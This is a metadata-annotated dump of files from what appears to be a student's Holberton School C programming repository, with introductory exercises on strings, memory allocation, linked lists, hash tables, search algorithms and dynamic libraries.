[`0x0C-more_malloc_free`](https://github.com/david-develop/holbertonschool-low_level_programming/tree/master/0x0C-more_malloc_free) | Dynamic Memory allocation, using malloc in C |\n| [`0x0D-preprocessor`](https://github.com/david-develop/holbertonschool-low_level_programming/tree/master/0x0D-preprocessor) | Using Macros and the preprocessor compilation step |\n| [`0x0E-structures_typedef`](https://github.com/david-develop/holbertonschool-low_level_programming/tree/master/0x0E-structures_typedef) | C structures data type, data type definition |\n| [`0x0F-function_pointers`](https://github.com/david-develop/holbertonschool-low_level_programming/tree/master/0x0F-function_pointers) | Pointer to function declaration and usage |\n| [`0x10-variadic_functions`](https://github.com/david-develop/holbertonschool-low_level_programming/tree/master/0x10-variadic_functions) | Using variadic functions |\n| [`0x12-singly_linked_lists`](https://github.com/david-develop/holbertonschool-low_level_programming/tree/master/0x12-singly_linked_lists) | Linked list data type paradigm |\n| 
[`0x13-more_singly_linked_lists`](https://github.com/david-develop/holbertonschool-low_level_programming/tree/master/0x13-more_singly_linked_lists) | Linked list data type paradigm |\n| [`0x14-bit_manipulation`](https://github.com/david-develop/holbertonschool-low_level_programming/tree/master/0x14-bit_manipulation) | Using bitwise operators with variables, low-level binary handling |\n| [`0x15-file_io`](https://github.com/david-develop/holbertonschool-low_level_programming/tree/master/0x15-file_io) | Using File input and output, using file descriptors and open, write, read functions |\n| [`0x17-doubly_linked_lists`](https://github.com/david-develop/holbertonschool-low_level_programming/tree/master/0x17-doubly_linked_lists) | Using the doubly linked list data type in algorithms |\n| [`0x18-dynamic_libraries`](https://github.com/david-develop/holbertonschool-low_level_programming/tree/master/0x18-dynamic_libraries) | Using dynamic libraries, creating, compiling and using in **C** |\n| [`0x1A-hash_tables`](https://github.com/david-develop/holbertonschool-low_level_programming/tree/master/0x1A-hash_tables) | Using Hash tables, doubly linked lists, introduction to hash algorithms with **C** |\n| [`0x1B-sorting_algorithms`](https://github.com/david-develop/holbertonschool-low_level_programming/tree/master/0x1B-sorting_algorithms) | Computer Science sorting algorithms in **C** |\n| [`0x1C-makefiles`](https://github.com/david-develop/holbertonschool-low_level_programming/tree/master/0x1C-makefiles) | Using the makefiles feature with **C** |\n| [`0x1D-binary_trees`](https://github.com/david-develop/holbertonschool-low_level_programming/tree/master/0x1D-binary_trees) | Binary tree data structure, algorithms to sort and create binary trees in **C**; this project uses a lot of dynamic memory functions and complex recursive algorithms |\n| [`0x1E-search_algorithms`](https://github.com/david-develop/holbertonschool-low_level_programming/tree/master/0x1E-search_algorithms) | A search algorithm is any algorithm which solves the search problem; this project uses the space complexity concept |\n" }, { "alpha_fraction": 0.5414634346961975, "alphanum_fraction": 0.5560975670814514, "avg_line_length": 17.08823585510254, "blob_id": "68b00f132bca7d46ff578bafa244cb2e43e2d635", "content_id": "02f5f3e27e18bc3f40855d354ebd46cbee74453e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 615, "license_type": "no_license", "max_line_length": 70, "num_lines": 34, "path": "/0x0A-argc_argv/4-add.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n#include <stdlib.h>\n#include <ctype.h>\n/**\n * main - program that prints the sum of its command line arguments.\n * @argc: argument count.\n * @argv: argument vector.\n * Return: 1 if an argument is not a number, otherwise 0.\n */\n\nint main(int argc, char *argv[])\n{\n\tint i, array_i;\n\tint sum = 0;\n\n\t(void)argv;\n\tif (argc > 1)\n\t{\n\t\tfor (i = 1; i < argc; i++)\n\t\t{\n\t\t\tfor (array_i = 0; argv[i][array_i] != '\\0'; array_i++)\n\t\t\t{\n\t\t\t\tif (!isdigit(argv[i][array_i]))\n\t\t\t\t{\n\t\t\t\t\tprintf(\"Error\\n\");\n\t\t\t\t\treturn (1);\n\t\t\t\t}\n\t\t\t}\n\t\t\tsum += atoi(argv[i]);\n\t\t}\n\t}\n\tprintf(\"%d\\n\", sum);\n\treturn (0);\n}\n" }, { "alpha_fraction": 0.5693069100379944, "alphanum_fraction": 0.5693069100379944, "avg_line_length": 12.714285850524902, "blob_id": "c690feec7e144b431355138a1e26dc5777ba6028", "content_id": 
"66b924853be158b8c1f223471ccbb603f8d09f2d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 202, "license_type": "no_license", "max_line_length": 29, "num_lines": 15, "path": "/0x02-functions_nested_loops/10-add.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n/**\n * add - add two integers.\n * @a: first input value.\n * @b: second input value.\n * Return: the result of sum.\n */\n\nint add(int a, int b)\n{\n\tint r;\n\n\tr = a + b;\n\treturn (r);\n}\n" }, { "alpha_fraction": 0.4876847267150879, "alphanum_fraction": 0.5295566320419312, "avg_line_length": 15.916666984558105, "blob_id": "8248a3d2c097521af97ce9f3eb54c61781672f3d", "content_id": "90b914fa72d87ea514d0658a5d1ee96b92ec34c6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 406, "license_type": "no_license", "max_line_length": 73, "num_lines": 24, "path": "/0x06-pointers_arrays_strings/3-strcmp.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n/**\n * _strcmp - compare the strings\n * @s1: the firts input string.\n * @s2: the second input string.\n * Return: if strings are the same 0, if not the difference between both.\n */\nint _strcmp(char *s1, char *s2)\n{\n\tint i = 0;\n\n\twhile ((s1[i] != '\\0' && s2[i] != '\\0') && (s1[i] == s2[i]))\n\t{\n\t\ti++;\n\t}\n\tif (s1[i] == s2[i])\n\t{\n\t\treturn (0);\n\t}\n\telse\n\t{\n\t\treturn (s1[i] - s2[i]);\n\t}\n}\n" }, { "alpha_fraction": 0.5082873106002808, "alphanum_fraction": 0.519336998462677, "avg_line_length": 10.3125, "blob_id": "e66f543c2f1e20170816fb9b28d9f623a7c77c94", "content_id": "4763496f93294dca3cc7fc90a3d7abd87db08d89", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 181, "license_type": "no_license", "max_line_length": 38, "num_lines": 16, "path": "/0x04-more_functions_nested_loops/3-print_numbers.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n/**\n * print_numbers - Prints the numbers.\n *\n */\n\nvoid print_numbers(void)\n{\n\tchar a;\n\n\tfor (a = '0'; a <= '9'; a++)\n\t{\n\t\t_putchar(a);\n\t}\n\t_putchar('\\n');\n}\n" }, { "alpha_fraction": 0.8507462739944458, "alphanum_fraction": 0.8507462739944458, "avg_line_length": 26, "blob_id": "2123f3aaf591595c904be5c6e780852d86e041f3", "content_id": "67ac9d26002b690f1ab38644c8001183544b441e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 134, "license_type": "no_license", "max_line_length": 91, "num_lines": 5, "path": "/0x03-debugging/README.md", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "This folder contains different debugged file, as part of the development of debbugin skills\n\nComments\nAnalisis\nBetty style corrections" }, { "alpha_fraction": 0.530351459980011, "alphanum_fraction": 0.5399361252784729, "avg_line_length": 15.473684310913086, "blob_id": "e1ce91dd993d80c51ad49c2b0cfd07927c44eaf4", "content_id": "4407885a49e95ff26a3e18322647c67335547820", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 313, "license_type": "no_license", "max_line_length": 53, "num_lines": 19, "path": "/0x06-pointers_arrays_strings/4-rev_array.c", "repo_name": 
"david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n/**\n * reverse_array - print the given string in reverse.\n * @a: input array.\n * @n: number of arrays.\n */\nvoid reverse_array(int *a, int n)\n{\n\tint iter, last_i, in;\n\n\tfor (iter = 0; iter < n; iter++)\n\t{\n\t\tin = a[iter];\n\t\tlast_i = a[n - 1];\n\t\ta[iter] = last_i;\n\t\ta[n - 1] = in;\n\t\tn--;\n\t}\n}\n" }, { "alpha_fraction": 0.49886104464530945, "alphanum_fraction": 0.5261958837509155, "avg_line_length": 19.904762268066406, "blob_id": "898c32ebf5cf6cae0c2b17cbe78c742ce6fe95a1", "content_id": "f2aa8e6ab1bb9abc998ef4af56499bb2561ccbd3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 439, "license_type": "no_license", "max_line_length": 75, "num_lines": 21, "path": "/0x07-pointers_arrays_strings/8-print_diagsums.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n#include <stdio.h>\n/**\n * print_diagsums - prints the sum of the two diagonals of a square matrix.\n * @a: input matrix.\n * @size: size of the matrix.\n */\nvoid print_diagsums(int *a, int size)\n{\n\tint i, sum_1 = 0, sum_2 = 0;\n\n\tfor (i = 0; i < size; i++)\n\t{\n\t\tsum_1 += a[(i * size) + i];\n\t}\n\tfor (i = (size - 1); i < ((size * size) - 1); i = i + (size - 1))\n\t{\n\t\tsum_2 += a[i];\n\t}\n\tprintf(\"%d, %d\\n\", sum_1, sum_2);\n}\n" }, { "alpha_fraction": 0.5745967626571655, "alphanum_fraction": 0.5786290168762207, "avg_line_length": 16.714284896850586, "blob_id": "d4f7b9bac7c4d3f50910dab2997f1a5e5d6d50a2", "content_id": "f2865a3672e28207e46193c90c252332bf4d96ae", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 496, "license_type": "no_license", "max_line_length": 46, "num_lines": 28, "path": "/0x0C-more_malloc_free/3-array_range.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n#include <stdlib.h>\n/**\n * array_range - creates an array of integers.\n * @min: minimun value.\n * @max: max value.\n * Return: Pointer to allocated memory.\n */\nint *array_range(int min, int max)\n{\n\tint *arr_i = NULL;\n\tint i, rang_arr;\n\n\tif (min > max)\n\t\treturn (NULL);\n\n\trang_arr = max - min + 1;\n\n\tarr_i = malloc(sizeof(int) * (rang_arr));\n\tif (arr_i == NULL)\n\t\treturn (NULL);\n\tfor (i = 0; min < max; i++, min++)\n\t{\n\t\tarr_i[i] = min;\n\t}\n\tarr_i[i] = max;\n\treturn (arr_i);\n}\n" }, { "alpha_fraction": 0.8131868243217468, "alphanum_fraction": 0.8131868243217468, "avg_line_length": 90, "blob_id": "f427031d592db9f8e1fe47c77506a6e539ffd41a", "content_id": "efa036cfb492d1d0e31c3f294d4678e907855e34", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 91, "license_type": "no_license", "max_line_length": 90, "num_lines": 1, "path": "/0x0A-argc_argv/README.md", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "This repository contain the projects concerning to the use of argc and argv in C programs. 
" }, { "alpha_fraction": 0.6532507538795471, "alphanum_fraction": 0.6594427227973938, "avg_line_length": 18, "blob_id": "b11c23d87c8a7c3b7fe2686a6fac0a94ae991ab1", "content_id": "e5e0b7bed98bd72d2e78e78668ca267e7f1a55b9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 323, "license_type": "no_license", "max_line_length": 64, "num_lines": 17, "path": "/0x0C-more_malloc_free/0-malloc_checked.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n#include <stdlib.h>\n/**\n * malloc_checked - function that allocates memory using malloc.\n * @b: space requested.\n * Return: Pointer to allocated memory.\n */\nvoid *malloc_checked(unsigned int b)\n{\n\tvoid *mem_ad = NULL;\n\n\tmem_ad = malloc(b);\n\tif (mem_ad == NULL)\n\t\texit(98);\n\telse\n\t\treturn (mem_ad);\n}\n" }, { "alpha_fraction": 0.5372549295425415, "alphanum_fraction": 0.5503268241882324, "avg_line_length": 17.214284896850586, "blob_id": "837c1c1a0de6086e483f72e8c0bbcf91c85caddc", "content_id": "5f9c90344082d1e40f25012c50a8eea6b8c1af41", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 765, "license_type": "no_license", "max_line_length": 71, "num_lines": 42, "path": "/0x0B-malloc_free/3-alloc_grid.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n#include <stdlib.h>\n/**\n * alloc_grid - returns a pointer to a 2 dimensional array of integers.\n * @width: width of the matrix.\n * @height: height of the matrix.\n * Return: Pointer to a 2 dimensional array of integrers.\n */\nint **alloc_grid(int width, int height)\n{\n\tint **grid_a;\n\tint i, j, k;\n\n\tif (width <= 0 || height <= 0)\n\t\treturn (NULL);\n\n\tgrid_a = malloc(height * sizeof(int *));\n\n\tif (grid_a == NULL)\n\t{\n\t\treturn (NULL);\n\t}\n\n\tfor (i = 0; i < height; i++)\n\t{\n\t\tgrid_a[i] = malloc(width * sizeof(int));\n\t\tif (grid_a[i] == NULL)\n\t\t{\n\t\t\tfor (k = i - 1; k >= 0; k--)\n\t\t\t\tfree(grid_a[k]);\n\t\t\tfree(grid_a);\n\t\t\treturn (NULL);\n\t\t}\n\t}\n\n\tfor (i = 0; i < height; i++)\n\t{\n\t\tfor (j = 0; j < width; j++)\n\t\t\tgrid_a[i][j] = 0;\n\t}\n\treturn (grid_a);\n}\n" }, { "alpha_fraction": 0.48767122626304626, "alphanum_fraction": 0.501369833946228, "avg_line_length": 13.600000381469727, "blob_id": "3f44f4473979f810b61db297455749bbbc83bf38", "content_id": "852b083146a60edd99eb9d3ca0820244432b2af8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 365, "license_type": "no_license", "max_line_length": 50, "num_lines": 25, "path": "/0x05-pointers_arrays_strings/5-rev_string.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n/**\n * rev_string - print the given string in reverse.\n * @s: input string.\n *\n */\nvoid rev_string(char *s)\n{\n\tint i = 0, iter;\n\tchar last_d, c;\n\n\t/*count the lenght of the string*/\n\twhile (*(s + i) != '\\0')\n\t{\n\t\ti++;\n\t}\n\tfor (iter = 0; iter < i; iter++)\n\t{\n\t\tc = s[iter];\n\t\tlast_d = s[i - 1];\n\t\ts[iter] = last_d;\n\t\ts[i - 1] = c;\n\t\ti--;\n\t}\n}\n" }, { "alpha_fraction": 0.6409090757369995, "alphanum_fraction": 0.6409090757369995, "avg_line_length": 22.157894134521484, "blob_id": "73bae53abe1c317cc282e099750cfee753a57c2b", "content_id": "4ea0e70d580e26698cd7a3749864897218f1d49b", 
"detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 440, "license_type": "no_license", "max_line_length": 70, "num_lines": 19, "path": "/0x13-more_singly_linked_lists/2-add_nodeint.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"lists.h\"\n/**\n * add_nodeint - adds a new node at the beginning of a listint_t list.\n * @head: pointer to first node.\n * @n: given int to be added.\n * Return: the address of the new element, or NULL if it failed.\n */\nlistint_t *add_nodeint(listint_t **head, const int n)\n{\n\tlistint_t *temp;\n\n\ttemp = malloc(sizeof(listint_t));\n\tif (temp == NULL)\n\t\treturn (NULL);\n\ttemp->n = n;\n\ttemp->next = *head;\n\t*head = temp;\n\treturn (temp);\n}\n" }, { "alpha_fraction": 0.5542635917663574, "alphanum_fraction": 0.565891444683075, "avg_line_length": 13.333333015441895, "blob_id": "6b25c66791bda4d541817ced5582415035acf649", "content_id": "65d8c7d6560388b8472fb86362a09e6d694a6b28", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 258, "license_type": "no_license", "max_line_length": 48, "num_lines": 18, "path": "/0x04-more_functions_nested_loops/0-isupper.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n/**\n * _isupper - Verify if the letter is uppercase.\n * @c: variable for input value.\n * Return: 1 when input is a uppercase letter.\n */\n\nint _isupper(int c)\n{\n\tif (c >= 'A' && c <= 'Z')\n\t{\n\t\treturn (1);\n\t}\n\telse\n\t{\n\t\treturn (0);\n\t}\n}\n" }, { "alpha_fraction": 0.8390804529190063, "alphanum_fraction": 0.8390804529190063, "avg_line_length": 43, "blob_id": "e8f4eb5b688fe2c60966ce2d14fb4db4f194bd99", "content_id": "715af68801d9ab26c7bdb75c8bfc99ef4a083122", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 87, "license_type": "no_license", "max_line_length": 79, "num_lines": 2, "path": "/0x00-hello_world/README.md", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "This project is about the basics of C programming, specialy compilation process\n#CISFUN" }, { "alpha_fraction": 0.6214421391487122, "alphanum_fraction": 0.6280834674835205, "avg_line_length": 21.4255313873291, "blob_id": "abf1b2c6eff73aa6e09f354c395ddb5b8a07c3e2", "content_id": "7145838bd392a3ca94cc23e2a418ae1d9f0f253d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1054, "license_type": "no_license", "max_line_length": 72, "num_lines": 47, "path": "/0x1A-hash_tables/3-hash_table_set.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"hash_tables.h\"\n\n/**\n * hash_table_set - function that adds an element to the hash table.\n * @ht: hash table to add or update the key/value\n * @key: key value to add or update.\n * @value: value associated with the key.\n * Return: 1 if it succeeded, 0 otherwise.\n */\n\nint hash_table_set(hash_table_t *ht, const char *key, const char *value)\n{\n\thash_node_t *new_node;\n\thash_node_t *temp;\n\thash_node_t *cursor;\n\tunsigned long int index;\n\n\tif (ht == NULL || key == NULL)\n\t\treturn (0);\n\n\tindex = key_index((const unsigned char *)key, ht->size);\n\n\tfor (cursor = ht->array[index]; cursor != NULL; cursor = cursor->next)\n\t{\n\t\tif (strcmp(cursor->key, key) 
== 0)\n\t\t{\n\t\t\tfree(cursor->value);\n\t\t\tcursor->value = strdup(value);\n\t\t\treturn (1);\n\t\t}\n\t}\n\n\tnew_node = malloc(sizeof(hash_node_t));\n\tif (new_node == NULL)\n\t\treturn (0);\n\tnew_node->key = strdup(key);\n\tnew_node->value = strdup(value);\n\tif (ht->array[index] == NULL)\n\t\tnew_node->next = NULL;\n\telse\n\t{\n\t\ttemp = ht->array[index];\n\t\tnew_node->next = temp;\n\t}\n\tht->array[index] = new_node;\n\treturn (1);\n}\n" }, { "alpha_fraction": 0.8241758346557617, "alphanum_fraction": 0.8241758346557617, "avg_line_length": 90, "blob_id": "7020a6367c6af883af048da28c9925899e669063", "content_id": "26500a7fa96ae4b3654c22b5a23ff823593b925f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 182, "license_type": "no_license", "max_line_length": 108, "num_lines": 2, "path": "/0x04-more_functions_nested_loops/README.md", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "This project is about the use of nested loops using prototype functions.\nPrograms that print different figures, like triangles, squares, inverted triangles, and other types of loops.\n" }, { "alpha_fraction": 0.4537205100059509, "alphanum_fraction": 0.5143288373947144, "avg_line_length": 14.068181991577148, "blob_id": "8616fb998635d1b7e1aa4468b5e6ea90d0a43618", "content_id": "9b0f565c4b92d5b6cb9a2484142589f56a0887a5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 663, "license_type": "no_license", "max_line_length": 72, "num_lines": 44, "path": "/0x0F-function_pointers/3-main.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"function_pointers.h\"\n#include \"3-calc.h\"\n#include <stdlib.h>\n#include <stdio.h>\n/**\n * main - performs simple operations.\n * @argc: argument count.\n * @argv: argument vector.\n * Return: Always 0.\n */\n\nint main(int argc, char *argv[])\n{\n\tint num1, num2, calc;\n\tchar *op;\n\n\tif (argc != 4)\n\t{\n\t\tprintf(\"Error\\n\");\n\t\texit(98);\n\t}\n\n\tnum1 = atoi(argv[1]);\n\tnum2 = atoi(argv[3]);\n\top = argv[2];\n\n\tif (*op != '+' && *op != '-' && *op != '*' && *op != '/' && *op != '%')\n\t{\n\t\tprintf(\"Error\\n\");\n\t\texit(99);\n\t}\n\n\tif (op[1] == '\\0')\n\t{\n\t\tcalc = (*get_op_func(op))(num1, num2);\n\t\tprintf(\"%d\\n\", calc);\n\t}\n\telse\n\t{\n\t\tprintf(\"Error\\n\");\n\t\texit(99);\n\t}\n\treturn (0);\n}\n" }, { "alpha_fraction": 0.7400000095367432, "alphanum_fraction": 0.7400000095367432, "avg_line_length": 7.333333492279053, "blob_id": "027e94594fa7bb77f78d1f1a747ac1d2c6075896", "content_id": "1b860a2fe0334b8226eb521e466064d96a380b61", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 50, "license_type": "no_license", "max_line_length": 19, "num_lines": 6, "path": "/0x0D-preprocessor/holberton.h", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#ifndef HOLBERTON_H\n#define HOLBERTON_H\n\n\n\n#endif\n" }, 
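The 3-hash_table_set.c record above adds or updates a key/value pair, chaining collisions at the head of the bucket. A usage sketch, assuming hash_table_create and hash_table_get from the same 0x1A-hash_tables project (neither is shown in this listing, so treat both as assumptions):

#include <stdio.h>
#include "hash_tables.h"

int main(void)
{
	hash_table_t *ht = hash_table_create(1024); /* assumed helper */

	if (ht == NULL)
		return (1);
	hash_table_set(ht, "betty", "cool");
	hash_table_set(ht, "betty", "still cool"); /* takes the update path */
	printf("%s\n", hash_table_get(ht, "betty")); /* assumed helper */
	return (0);
}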
"/0x17-doubly_linked_lists/7-insert_dnodeint.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"lists.h\"\n\n/**\n * insert_dnodeint_at_index - inserts a new node at a given position.\n * @h: pointer to first node.\n * @idx: given node index.\n * @n: data to store in the new node.\n * Return: return the address of the new node, or NULL if it failed or\n * if it is not possible to add the new node at index idx.\n */\ndlistint_t *insert_dnodeint_at_index(dlistint_t **h, unsigned int idx, int n)\n{\n\tdlistint_t *new;\n\tdlistint_t *cursor;\n\tunsigned int i;\n\n\tif (h == NULL)\n\t\treturn (NULL);\n\tcursor = *h;\n\tif (idx == 0)\n\t{\n\t\tnew = add_dnodeint(h, n);\n\t\treturn (new);\n\t}\n\tif (cursor != NULL)\n\t\twhile (cursor->prev != NULL)\n\t\t\tcursor = cursor->prev;\n\tfor (i = 1; cursor != NULL; i++, cursor = cursor->next)\n\t{\n\t\tif (i == idx)\n\t\t{\n\t\t\tif (cursor->next == NULL)\n\t\t\t{\n\t\t\t\tnew = add_dnodeint_end(h, n);\n\t\t\t\treturn (new);\n\t\t\t}\n\t\t\tnew = malloc(sizeof(dlistint_t));\n\t\t\tif (new == NULL)\n\t\t\t\treturn (NULL);\n\t\t\tnew->n = n;\n\t\t\tnew->next = cursor->next;\n\t\t\tnew->prev = cursor;\n\t\t\tcursor->next->prev = new;\n\t\t\tcursor->next = new;\n\t\t\treturn (new);\n\t\t}\n\t}\n\treturn (NULL);\n}\n" }, { "alpha_fraction": 0.62992924451828, "alphanum_fraction": 0.634479284286499, "avg_line_length": 26.47222137451172, "blob_id": "aac95d885371049e397323f4d25337b238630dd8", "content_id": "c58f95ca4b2cab2ebbc23f7a59c8e72a625442af", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1978, "license_type": "no_license", "max_line_length": 74, "num_lines": 72, "path": "/0x1E-search_algorithms/100-jump.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"search_algos.h\"\n#include <math.h>\n\n/**\n * linear_mod - function that searches for a value in an array of integers\n * using the Linear search algorithm\n * @array: a pointer to the first element of the array to search in\n * @start: initial index\n * @end: final index\n * @value: is the value to search for\n * Return: return the first index where value is located, If value is not\n * present in array or if array is NULL, your function must return -1\n */\n\nint linear_mod(int *array, size_t start, size_t end, int value)\n{\n\tsize_t i;\n\n\tif (array == NULL)\n\t\treturn (-1);\n\n\tfor (i = start; i <= end; i++)\n\t{\n\t\tprintf(\"Value checked array[%d] = [%d]\\n\", (int) i, array[i]);\n\t\tif (array[i] == value)\n\t\t\treturn ((int) i);\n\t}\n\treturn (-1);\n}\n\n/**\n * jump_search - function that searches for a value in a sorted array of\n * integers using the Jump search algorithm\n * @array: a pointer to the first element of the array to search in\n * @size: the number of elements in array\n * @value: is the value to search for\n * Return: return the first index where value is located, If value is not\n * present in array or if array is NULL, your function must return -1\n */\nint jump_search(int *array, size_t size, int value)\n{\n\tsize_t start, end, block_s;\n\n\tblock_s = sqrt(size);\n\n\tif (array == NULL)\n\t\treturn (-1);\n\n\tfor (start = 0, end = block_s; end < size; end += block_s)\n\t{\n\t\tstart = end - block_s;\n\n\t\tprintf(\"Value checked array[%d] = [%d]\\n\", (int) start, array[start]);\n\t\tif (array[start] > value && start == 0)\n\t\t\treturn (-1);\n\t\telse if (array[end] >= 
value)\n\t\t\tbreak;\n\t}\n\n\tif (end >= size)\n\t{\n\t\tstart = end - block_s;\n\t\tprintf(\"Value checked array[%d] = [%d]\\n\", (int) start, array[start]);\n\t\tprintf(\"Value found between indexes [%d] and [%d]\\n\", (int) start,\n\t\t (int) (end));\n\t\treturn (linear_mod(array, start, size - 1, value));\n\t}\n\n\tprintf(\"Value found between indexes [%d] and [%d]\\n\", (int) start,\n\t (int) (end));\n\treturn (linear_mod(array, start, end, value));\n}\n" }, 
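A minimal driver for the jump_search record above; a sketch assuming the prototype is declared in the project's search_algos.h (this main is hypothetical):

#include <stdio.h>
#include "search_algos.h"

int main(void)
{
	int array[] = {0, 1, 2, 3, 4, 7, 12, 15, 18, 19, 23};
	size_t size = sizeof(array) / sizeof(array[0]);

	/* checks one element per sqrt(size) block, then scans linearly */
	printf("Found 15 at index: %d\n", jump_search(array, size, 15));
	return (0);
}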
{ "alpha_fraction": 0.6666666865348816, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 15.5, "blob_id": "44094055917dada6e9d98a140a90cac54808daaf", "content_id": "66f8169548e2d8c03738f32c15b20e63629920bd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 99, "license_type": "no_license", "max_line_length": 29, "num_lines": 6, "path": "/0x0D-preprocessor/4-sum.h", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#ifndef FUNCTION_LIKE_MACRO_H\n#define FUNCTION_LIKE_MACRO_H\n\n#define SUM(x, y) ((x) + (y))\n\n#endif\n" }, { "alpha_fraction": 0.5485714077949524, "alphanum_fraction": 0.5571428537368774, "avg_line_length": 15.217391014099121, "blob_id": "c94ffe2e64e8ff8af3a545e0a0b4078ab8f593fa", "content_id": "86361134273342554e1425e4e8791b50dcbf3158", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 350, "license_type": "no_license", "max_line_length": 53, "num_lines": 23, "path": "/0x05-pointers_arrays_strings/9-strcpy.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n\n/**\n * _strcpy - function that copies the string pointed.\n * @dest: pointed destiny.\n * @src: input string.\n * Return: pointer to dest.\n */\nchar *_strcpy(char *dest, char *src)\n{\n\tchar *ini_s = dest;\n\n\twhile (*src != '\\0')\n\t{\n\t\t*dest = *src;\n\t\tdest++;\n\t\tsrc++;\n\t}\n\n\t/* add '\\0' at the end */\n\t*dest = '\\0';\n\treturn (ini_s);\n}\n" }, { "alpha_fraction": 0.5932203531265259, "alphanum_fraction": 0.5932203531265259, "avg_line_length": 28.5, "blob_id": "4ac87e69d0ef80113abfdaa1be5615fe4e097675", "content_id": "3cb67eb23af8255a51aedc953bee2c318e67410d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 59, "license_type": "no_license", "max_line_length": 46, "num_lines": 2, "path": "/0x18-dynamic_libraries/1-create_dynamic_lib.sh", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#!/bin/bash\ngcc -fPIC -c *.c ; gcc -shared -o liball.so *.o\n" }, { "alpha_fraction": 0.5117647051811218, "alphanum_fraction": 0.5411764979362488, "avg_line_length": 13.600000381469727, "blob_id": "f01f1a3436d1baee3e6aadb55ac1c35652a00a5e", "content_id": "a1b2d82efa97a7f49dbda9ac64143c125b684486", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 340, "license_type": "no_license", "max_line_length": 59, "num_lines": 25, "path": "/0x02-functions_nested_loops/5-sign.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n/**\n * print_sign - Verify sign of variable.\n * @n: variable for input value.\n * Return: 1 when positive, 0 when 0, and -1 when negative.\n */\n\nint print_sign(int n)\n{\n\tif (n > 0)\n\t{\n\t\t_putchar('+');\n\t\treturn (1);\n\t}\n\telse if (n == 0)\n\t{\n\t\t_putchar('0');\n\t\treturn (0);\n\t}\n\telse\n\t{\n\t\t_putchar('-');\n\t\treturn (-1);\n\t}\n}\n" }, { "alpha_fraction": 0.7898832559585571, "alphanum_fraction": 0.7898832559585571, "avg_line_length": 31.125, "blob_id": "627e723a7c8c599780c509133511f423cf90c1a5", "content_id": "e9aaa42c4ab62d1ad6d8cae6a067e53b99811e09", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 257, "license_type": "no_license", "max_line_length": 73, "num_lines": 8, "path": 